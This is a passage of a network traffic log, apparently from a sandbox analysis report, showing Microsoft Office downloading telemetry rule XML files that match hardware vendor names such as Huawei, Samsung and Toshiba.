                          2024-11-25 16:56:38 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                          Session IDSource IPSource PortDestination IPDestination Port
                          36192.168.2.44978813.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:39 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:40 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:40 GMT
                          Content-Type: text/xml
                          Content-Length: 499
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                          ETag: "0x8DC582B98CEC9F6"
                          x-ms-request-id: aaf2b452-f01e-0071-621c-3e431c000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165640Z-178bfbc474bwlrhlhC1NYCy3kg00000007n000000000uap9
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:40 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          37192.168.2.44978913.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:40 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:40 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:40 GMT
                          Content-Type: text/xml
                          Content-Length: 415
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                          ETag: "0x8DC582B988EBD12"
                          x-ms-request-id: 9a3ed3ee-501e-00a0-41c6-3e9d9f000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165640Z-178bfbc474bfw4gbhC1NYCunf400000007t0000000009q7v
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:40 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                          Session IDSource IPSource PortDestination IPDestination Port
                          38192.168.2.44979113.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:40 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:40 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:40 GMT
                          Content-Type: text/xml
                          Content-Length: 419
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                          ETag: "0x8DC582BB32BB5CB"
                          x-ms-request-id: bd408748-301e-0052-28b9-3d65d6000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165640Z-15b8b599d88f9wfchC1TEBm2kc00000006ag00000000ec7p
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                          Session IDSource IPSource PortDestination IPDestination Port
                          39192.168.2.44979013.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:40 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:40 UTC491INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:40 GMT
                          Content-Type: text/xml
                          Content-Length: 471
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                          ETag: "0x8DC582BB5815C4C"
                          x-ms-request-id: 876f21bf-101e-007a-0bbf-3e047e000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165640Z-178bfbc474bpnd5vhC1NYC4vr400000007p000000000pw9b
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          X-Cache-Info: L1_T2
                          Accept-Ranges: bytes
                          2024-11-25 16:56:40 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          40192.168.2.44979213.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:40 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:41 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:40 GMT
                          Content-Type: text/xml
                          Content-Length: 494
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                          ETag: "0x8DC582BB8972972"
                          x-ms-request-id: 81bf26fc-f01e-0099-6bb6-3e9171000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165640Z-178bfbc474bw8bwphC1NYC38b400000007fg00000000rre1
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:41 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          41192.168.2.44979313.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:42 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:42 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:42 GMT
                          Content-Type: text/xml
                          Content-Length: 420
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                          ETag: "0x8DC582B9DAE3EC0"
                          x-ms-request-id: 81672928-a01e-001e-4184-3b49ef000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165642Z-174c587ffdfb74xqhC1TEBhabc0000000690000000005usf
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:42 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                          Session IDSource IPSource PortDestination IPDestination Port
                          42192.168.2.44979413.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:42 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:42 UTC491INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:42 GMT
                          Content-Type: text/xml
                          Content-Length: 472
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                          ETag: "0x8DC582B9D43097E"
                          x-ms-request-id: 235e6caf-401e-000a-7018-3f4a7b000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165642Z-15b8b599d88phfhnhC1TEBr51n000000067g00000000r3w0
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          X-Cache-Info: L1_T2
                          Accept-Ranges: bytes
                          2024-11-25 16:56:42 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          43192.168.2.44979613.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:42 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:43 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:43 GMT
                          Content-Type: text/xml
                          Content-Length: 486
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                          ETag: "0x8DC582B92FCB436"
                          x-ms-request-id: 95b9e869-801e-008c-3081-3b7130000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165643Z-174c587ffdfldtt2hC1TEBwv9c00000005z000000000sq7f
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:43 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          44192.168.2.44979513.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:42 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:43 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:43 GMT
                          Content-Type: text/xml
                          Content-Length: 427
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                          ETag: "0x8DC582BA909FA21"
                          x-ms-request-id: 5532245b-c01e-00ad-0e6f-3da2b9000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165643Z-174c587ffdfx984chC1TEB676g000000063000000000uq3a
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:43 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                          Session IDSource IPSource PortDestination IPDestination Port
                          45192.168.2.44979713.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:42 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:43 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:43 GMT
                          Content-Type: text/xml
                          Content-Length: 423
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                          ETag: "0x8DC582BB7564CE8"
                          x-ms-request-id: d83ea369-501e-000a-040c-3d0180000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165643Z-178bfbc474bw8bwphC1NYC38b400000007pg000000001xq3
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:43 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                          Session IDSource IPSource PortDestination IPDestination Port
                          46192.168.2.44979813.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:44 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:45 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:45 GMT
                          Content-Type: text/xml
                          Content-Length: 478
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                          ETag: "0x8DC582B9B233827"
                          x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165645Z-174c587ffdfx984chC1TEB676g000000067g00000000adm2
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:45 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
